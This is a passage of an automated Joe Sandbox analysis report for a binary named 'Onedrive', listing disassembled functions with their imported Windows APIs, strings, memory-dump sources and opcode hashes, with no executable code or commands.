                                                      • Part of subcall function 00007FF63EA1AF8C: ?GetContentString@Element@DirectUI@@QEAAPEBGPEAPEAVValue@2@@Z.DUI70(?,?,00000000,00007FF63EA1360B), ref: 00007FF63EA1AFB3
                                                      • Part of subcall function 00007FF63EA1AF8C: ?Release@Value@DirectUI@@QEAAXXZ.DUI70(?,?,00000000,00007FF63EA1360B), ref: 00007FF63EA1B05A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$Direct$Process$Element@Free$AllocContentDescendent@Edit2@FindInputL___L_itf_inputscope_0000_0000_0001@@@Release@Scope@String@TouchV12@Value@Value@2@@W4___vsnwprintfmemmove
                                                    • String ID: CIDEdit%d
                                                    • API String ID: 1228671443-56484913
                                                    • Opcode ID: b3f517ad8b8d331d28c16e3b81a7e2f2708fd587a33e129d640477db628184b2
                                                    • Instruction ID: 5d136ebcf85e35bd05e84a891010c5211b00663e397aed3f6b0ee0d86fef5dbb
                                                    • Opcode Fuzzy Hash: b3f517ad8b8d331d28c16e3b81a7e2f2708fd587a33e129d640477db628184b2
                                                    • Instruction Fuzzy Hash: 1731A621708B9282EB109F62E8502BA7795FBE8B80F464535EE5DC7755DF3CE40E9720
                                                    Function 00007FFDF3AF0D10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_SchedulerScheduler::_
                                                    • String ID: %ls$minkernel\crts\ucrt\src\appcrt\stdio\_freebuf.cpp$public_stream != nullptr
                                                    • API String ID: 2780765137-1254537880
                                                    • Opcode ID: 9671912013f427561da62cdbcbe0db84c4c5786f34d3e8db949c768f68d6365d
                                                    • Instruction ID: 5dd3cf7a43b0d33dfb01ac69a825310b1debfa0d7d69695d323bf993e4b03c7c
                                                    • Opcode Fuzzy Hash: 9671912013f427561da62cdbcbe0db84c4c5786f34d3e8db949c768f68d6365d
                                                    • Instruction Fuzzy Hash: 84215721B28A8291E750EB22E871BBEB354FF90740F821131E59E9A6DEDF6CE554C740
                                                    Function 00007FFDF3AE8650 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_HandleModuleSchedulerScheduler::_
                                                    • String ID: CorExitProcess$mscoree.dll
                                                    • API String ID: 302703240-1276376045
                                                    • Opcode ID: b34438bd74859ec22cf35c33e7849494b920b0bc9de5fd7c946b7d7eaf88f171
                                                    • Instruction ID: e1157d3c5b2fe681f93af0399de83ec796f62a5220d1ab3e3c41654feb121a9a
                                                    • Opcode Fuzzy Hash: b34438bd74859ec22cf35c33e7849494b920b0bc9de5fd7c946b7d7eaf88f171
                                                    • Instruction Fuzzy Hash: 2B115422B1CA4691D720EB12E47166EB364FF84B94F810235E6BE5E6EDEF2CD544C700
                                                    Function 00007FF63EA1B350 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: DirectElement@V12@$Descendent@FindRoot@
                                                    • String ID: EnterNumber
                                                    • API String ID: 1418815912-1845196359
                                                    • Opcode ID: e83e042111be38edb18aba9be0cb80e9d35a4fae5e9649dce248d94c2b7ead39
                                                    • Instruction ID: b03e5f93dd6079a0c350556093c3aca0a0858fbab34876d1f5e04be504318362
                                                    • Opcode Fuzzy Hash: e83e042111be38edb18aba9be0cb80e9d35a4fae5e9649dce248d94c2b7ead39
                                                    • Instruction Fuzzy Hash: 52F06D36A08B82C2DB108B12B840039BAA0FBFAB80B489171EA8E93714CF3CD4599710
                                                    Function 00007FF63EA1B7E0 Relevance: 6.2, APIs: 4, Instructions: 178COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ?SetContentString@Element@DirectUI@@QEAAJPEBG@Z.DUI70 ref: 00007FF63EA1B8B0
                                                    • ?SetCaretPosition@TouchEdit2@DirectUI@@QEAAJJ@Z.DUI70 ref: 00007FF63EA1B8C2
                                                    • ?SetContentString@Element@DirectUI@@QEAAJPEBG@Z.DUI70 ref: 00007FF63EA1BA17
                                                    • ?SetCaretPosition@TouchEdit2@DirectUI@@QEAAJJ@Z.DUI70 ref: 00007FF63EA1BA2A
                                                      • Part of subcall function 00007FF63EA1BB50: StrToID.DUI70(?,?,00000000,00007FF63EA1B9AC), ref: 00007FF63EA1BB6B
                                                      • Part of subcall function 00007FF63EA1BB50: ?FindDescendent@Element@DirectUI@@QEAAPEAV12@G@Z.DUI70(?,?,00000000,00007FF63EA1B9AC), ref: 00007FF63EA1BB7E
                                                      • Part of subcall function 00007FF63EA1BB50: ?CreateString@Value@DirectUI@@SAPEAV12@PEBGPEAUHINSTANCE__@@@Z.DUI70(?,?,00000000,00007FF63EA1B9AC), ref: 00007FF63EA1BB96
                                                      • Part of subcall function 00007FF63EA1AF8C: ?GetContentString@Element@DirectUI@@QEAAPEBGPEAPEAVValue@2@@Z.DUI70(?,?,00000000,00007FF63EA1360B), ref: 00007FF63EA1AFB3
                                                      • Part of subcall function 00007FF63EA1AF8C: ?Release@Value@DirectUI@@QEAAXXZ.DUI70(?,?,00000000,00007FF63EA1360B), ref: 00007FF63EA1B05A
                                                      • Part of subcall function 00007FF63EA1B6D8: ?GetSelection@TouchEdit2@DirectUI@@QEAAJPEAJ0@Z.DUI70(?,?,00000000,00007FF63EA1B9D1), ref: 00007FF63EA1B6F6
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Direct$Element@String@$ContentEdit2@Touch$CaretPosition@V12@Value@$CreateDescendent@E__@@@FindRelease@Selection@Value@2@@
                                                    • String ID:
                                                    • API String ID: 94149341-0
                                                    • Opcode ID: 9617a7bb773a2561373628f6bd13398476fa04b197ade44adbcccafdb8f5e440
                                                    • Instruction ID: 6a9e56f8adca26cc04328ad7666f7b308898b102c661f8c6567a8b80ec917cde
                                                    • Opcode Fuzzy Hash: 9617a7bb773a2561373628f6bd13398476fa04b197ade44adbcccafdb8f5e440
                                                    • Instruction Fuzzy Hash: 45714B72B08906CBEB109FA5C4451BC23F1EBA4B84B515036EE0DD3769DF38E94AE760
                                                    Function 00007FF63EA1D06C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 129memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: _wcsicmp$Heap$FreeProcess
                                                    • String ID: VolumeActivationOrder
                                                    • API String ID: 1178357170-1688881641
                                                    • Opcode ID: 6c4fa031bcdf362423f6d4512dab34f2224128750b836ea986aa50372eb6991f
                                                    • Instruction ID: af4a03f3746b1787cae7827f0ee5d76dfa2a9f7182bcd408a9e29173e86f2764
                                                    • Opcode Fuzzy Hash: 6c4fa031bcdf362423f6d4512dab34f2224128750b836ea986aa50372eb6991f
                                                    • Instruction Fuzzy Hash: CA519222B08A12DAEB40DFA5C4913BD67A0BB64789F504539FE0ED6795CE3CE44DE360
                                                    Function 00007FFDF3AD7A30 Relevance: 6.1, APIs: 4, Instructions: 127COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: State$FrameHandler3::$BaseControlCurrentFromImage
                                                    • String ID:
                                                    • API String ID: 380775268-0
                                                    • Opcode ID: 2b8d69faa660a943a0bdc955ef5d249da78b774ef58b2996c34eb496772773d0
                                                    • Instruction ID: dc34b3e4f11ed184c2692100bcb6e97a438bba5ab78353cbec7fd6d20e317602
                                                    • Opcode Fuzzy Hash: 2b8d69faa660a943a0bdc955ef5d249da78b774ef58b2996c34eb496772773d0
                                                    • Instruction Fuzzy Hash: 19612D36A0CA8186D770DF16E0A176EB3A0FBC5B88F114531E6AD97B9ACF3DD5408B00
                                                    Function 00007FFDF3AF6A90 Relevance: 6.1, APIs: 4, Instructions: 99COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2f7c10dc392a8beebdcaf5d5ec4e5980cc8a6edf76ac842f313593ddf91837bd
                                                    • Instruction ID: e629907d5b6989b9f53d43b5344a6a926b5b7f9d7789fee84ffb3b19b0962cda
                                                    • Opcode Fuzzy Hash: 2f7c10dc392a8beebdcaf5d5ec4e5980cc8a6edf76ac842f313593ddf91837bd
                                                    • Instruction Fuzzy Hash: 9B412F22B0CB8182E750EB36E46576EB6A4EBC4780F511136E69D5BAEDDF3DD8418B00
                                                    Function 00007FFDF3AF6C40 Relevance: 6.1, APIs: 4, Instructions: 98COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 65ca2b3be36425672bca3afb5c9c352ffdf7975c78d53ac71ca2cb9e3fff23dc
                                                    • Instruction ID: e83703ef03c1fde03c846b5473e0284b5b437b40497e18167e3d17d84631a41f
                                                    • Opcode Fuzzy Hash: 65ca2b3be36425672bca3afb5c9c352ffdf7975c78d53ac71ca2cb9e3fff23dc
                                                    • Instruction Fuzzy Hash: 82411D22B0CB8182EB509B36E56576EB7A4EBC4780F111136F69E5BAEDDF3CD4418B00
                                                    Function 00007FFDF3AF82F0 Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c1bbe7d162f3c17f6aa1b842b0bac6b4a5da5a76b085f756f886f65c816da4db
                                                    • Instruction ID: 06cac054351a160eb14d3a01443659f43bb20a90a12e197281359d8cbfbaad50
                                                    • Opcode Fuzzy Hash: c1bbe7d162f3c17f6aa1b842b0bac6b4a5da5a76b085f756f886f65c816da4db
                                                    • Instruction Fuzzy Hash: C0410F22B0CA8182E7509B36E46176EB7A4EBC4780F110536F79D9BAEDDF3CD4409B00
                                                    Function 00007FF63EA13100 Relevance: 6.1, APIs: 4, Instructions: 89memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: String$AllocFreeInfoswscanf_s
                                                    • String ID:
                                                    • API String ID: 3357541311-0
                                                    • Opcode ID: 111d8d7a1cea06b5bdfedafb94a9521ac448ce82393592737d324e9f97004f28
                                                    • Instruction ID: 7cfe6978e5156db0edfe5f4fb6919ac046000a62363d062ee567437640b22342
                                                    • Opcode Fuzzy Hash: 111d8d7a1cea06b5bdfedafb94a9521ac448ce82393592737d324e9f97004f28
                                                    • Instruction Fuzzy Hash: 4D317422B0868286EE155F91A4503BDA652AFF9794F598034FB4EC7785DF3CE40DA720
                                                    Function 00007FF63EA15020 Relevance: 6.1, APIs: 4, Instructions: 88memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess$ErrorFieldLastSetupString
                                                    • String ID:
                                                    • API String ID: 2588027753-0
                                                    • Opcode ID: f5ac4ce10f203f946f340c793e59218f307c3b1212e54002b8199b7ad844837d
                                                    • Instruction ID: 409f6c0607e2af431855e646b55133da6c4258117fbb8b8fb0ec0e2f0d65a483
                                                    • Opcode Fuzzy Hash: f5ac4ce10f203f946f340c793e59218f307c3b1212e54002b8199b7ad844837d
                                                    • Instruction Fuzzy Hash: 5E318722B0C64386FF106BA194502BE6691FFB5784F564035FA4EC7785EE3DE809A760
                                                    Function 00007FF63EA14B14 Relevance: 6.1, APIs: 4, Instructions: 77COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00007FF63EA14A80: VirtualQuery.KERNEL32(?,?,?,?,?,?,?,?,000007EE,00007FF63EA14B32), ref: 00007FF63EA14AAB
                                                      • Part of subcall function 00007FF63EA14A80: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,000007EE,00007FF63EA14B32), ref: 00007FF63EA14ABC
                                                    • FindResourceExW.KERNEL32 ref: 00007FF63EA14B56
                                                    • GetLastError.KERNEL32 ref: 00007FF63EA14B67
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$FindQueryResourceVirtual
                                                    • String ID:
                                                    • API String ID: 571639142-0
                                                    • Opcode ID: a8bfd02c44b34e6d65e2e36b16032487fb88923247a44d14980593de26e02d56
                                                    • Instruction ID: 606bc154a6c32399c495a2e7f4dbcd8db694ffc0eddb71a8ee6652f22370f3be
                                                    • Opcode Fuzzy Hash: a8bfd02c44b34e6d65e2e36b16032487fb88923247a44d14980593de26e02d56
                                                    • Instruction Fuzzy Hash: 38216771B0C65382EB105BAAA45027965D1EFB5B54F544534FA4EC77C5EE3CE808A720
                                                    Function 00007FF63EA1E7D0 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                    • String ID:
                                                    • API String ID: 140117192-0
                                                    • Opcode ID: 2f80be9b24c969473baa277da42d0dd32167ed74b2d91ba5b62fed090ae2c901
                                                    • Instruction ID: 29b19b68af6752608919d8c211cd54f7fa8f9a1557931759a0334a82276f8587
                                                    • Opcode Fuzzy Hash: 2f80be9b24c969473baa277da42d0dd32167ed74b2d91ba5b62fed090ae2c901
                                                    • Instruction Fuzzy Hash: BB41E835A0AB4981EB508B0AF840365B364FBF8744F904136EA8D93765DF7DE44CE720
                                                    Function 00007FF63EA1A074 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: CloseFreeGenerateInstallationLocalOfflineOpen
                                                    • String ID:
                                                    • API String ID: 3853244748-0
                                                    • Opcode ID: a810da95c3ee36892a5de623d229d3be3f55b933a0224017fdab30da134d756a
                                                    • Instruction ID: 74b21307bbc124cb42f1e536379801e0dd8f9d73ed1ee19238db549a59552a40
                                                    • Opcode Fuzzy Hash: a810da95c3ee36892a5de623d229d3be3f55b933a0224017fdab30da134d756a
                                                    • Instruction Fuzzy Hash: 14217F25B08B8282EB109BA2D45037EABA1FFA9BC4F044534EA4EC7785DF7CE4099710
                                                    Function 00007FFDF3AF0370 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection__vcrt_lock$Concurrency::details::_DeleteEnterSchedulerScheduler::_
                                                    • String ID:
                                                    • API String ID: 27951074-0
                                                    • Opcode ID: 2f47923555553ca6756138a1e64b3529e04dd95027dec79b470d6570f577df9a
                                                    • Instruction ID: 3c2fb10265f6de6b7c1f48e09dd1ba5b9981f63f2c9a574d8c00a14f93207607
                                                    • Opcode Fuzzy Hash: 2f47923555553ca6756138a1e64b3529e04dd95027dec79b470d6570f577df9a
                                                    • Instruction Fuzzy Hash: C721F425B08A4686EB20DB26E4B173973A0FB98745F410236DDED5B7E9CE3DD5118B10
                                                    Function 00007FF63EA1A170 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: ActivationGrantsToken$CloseFreeOpen
                                                    • String ID:
                                                    • API String ID: 964983634-0
                                                    • Opcode ID: e527d962a64576a8af28e7d2c8c537f59b4613da025981c347f8ddf7a783fd70
                                                    • Instruction ID: 56aa57177183eafbfd3468713460883392d563b858bc93bddadcf0f06a6e969b
                                                    • Opcode Fuzzy Hash: e527d962a64576a8af28e7d2c8c537f59b4613da025981c347f8ddf7a783fd70
                                                    • Instruction Fuzzy Hash: A5218126B0864287EB144F96E4443796BA0FBA9B90F144531EA0EC3395DF3DD9489720
                                                    Function 00007FFDF3AF86F0 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Container_base12Container_base12::~_ErrorFileLastModuleName_dosmaperrstd::_
                                                    • String ID:
                                                    • API String ID: 2518310752-0
